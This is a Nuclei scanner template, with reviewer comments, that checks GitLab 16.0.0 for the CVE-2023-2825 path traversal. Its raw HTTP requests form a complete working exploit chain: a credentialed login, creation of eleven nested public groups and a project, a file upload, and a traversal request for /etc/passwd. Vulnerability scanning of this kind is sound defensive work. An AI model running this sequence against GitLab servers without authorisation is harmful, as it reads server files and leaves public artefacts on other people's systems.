# Nuclei HTTP template that checks a GitLab instance for CVE-2023-2825
# (path traversal, CWE-22) by building the affected layout itself and then
# probing it.
#
# Request sequence, in order:
#   1. fetch /users/sign_in, then sign in with the caller-supplied
#      {{username}} / {{password}};
#   2. create eleven groups {{data}}-1 .. {{data}}-11; every request after
#      the first passes an extracted {{parent_id}};
#   3. create a project named CVE-2023-2825 under {{namespace_id}};
#   4. upload one attachment with a random name and random content;
#   5. request that upload's URL followed by encoded `..%2F` segments ending
#      in etc%2Fpasswd.
#
# Review notes:
#   - The description calls the flaw unauthenticated, yet this check needs an
#     account that can create groups and projects (tag `authenticated`),
#     because it creates the precondition instead of looking for an
#     existing one.
#   - The check is state-changing (tag `intrusive`). No request here deletes
#     the groups, the project or the upload, so each run leaves them on the
#     target with visibility_level=20 (presumably GitLab's public level,
#     confirm). Remove the top-level group {{data}}-1 after a scan.
#   - A miss does not clear the host: login, group creation and a readable
#     /etc/passwd are all required for a match. Confirm the installed version
#     as well; the description scopes the issue to 16.0.0.
#   - For log hunting, the final request's shape is the indicator: a path
#     under /uploads/<hash>/ that continues with `..%2F` sequences.

id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  # NOTE(review): the remediation names no fixed version. The first reference
  # is the vendor's 16.0.1 security release post, presumably the fixing
  # release; confirm and name it here.
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.06942
    epss-percentile: 0.93215
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    # Matches the sixteen raw requests listed under http.
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query: title:"Gitlab"
  tags: cve,cve2023,gitlab,lfi,kev,authenticated,intrusive

variables:
  # Random 5-character prefix shared by every group name and path, so
  # artefacts from one run can be identified on the target afterwards.
  data: "{{rand_base(5)}}"

http:
  - raw:
      # Sign-in page; token_1 is extracted from a response body.
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      # Credentialed login using the caller-supplied username and password.
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      # Top-level group (empty parent_id). Deleting this group is the clean-up
      # handle for everything created below it.
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      # Groups 2-11: identical requests apart from the numeric suffix, each
      # sent with the {{parent_id}} value held at that point.
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      # Project creation under {{namespace_id}}; the only request carrying a
      # per-request timeout annotation (15s).
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      # Attachment upload; file name and content are both {{randstr}}, so no
      # meaningful data is written to the target.
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      # Probe: the upload URL with encoded parent-directory segments appended.
      # This is the request shape to search for in access logs.
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    # Both matchers must hold before a finding is reported.
    matchers-condition: and
    matchers:
      # The word is given hex-encoded; 726f6f743a78 decodes to "root:x".
      # No `part` is set, so the matcher's default part applies.
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      # Response headers must contain both strings. No status-code matcher
      # is defined.
      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    # All extractors are `internal: true`: their values feed later requests
    # and are not reported as findings.
    extractors:
      # Form token used by the login POST.
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      # csrf-token value sent as authenticity_token on the group and project
      # POSTs.
      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      # Numeric id taken from a "new subgroup" link in a response body.
      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      # NOTE(review): the pattern starts at `ref=`, not `href=`. Being
      # unanchored it still matches inside an href attribute; presumably a
      # typo, harmless as written.
      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      # Token sent in the X-CSRF-Token header of the upload request.
      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      # Upload directory hash used to build the probe URL.
      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# NOTE(review): the digest below signs the template text as published. A copy
# that has been reformatted or annotated will presumably fail signature
# verification until it is re-signed.
# digest: 490a0046304402204dd6642ac0eff433d5e6d99064b05f1076ad13d6949421020e6e1629e849c93e02205c76868656db0c1aefeeb166fbafd43247eda7b6c1c920db4f4e97ae9db44131:922c64590222798bb761d5b6d8e72950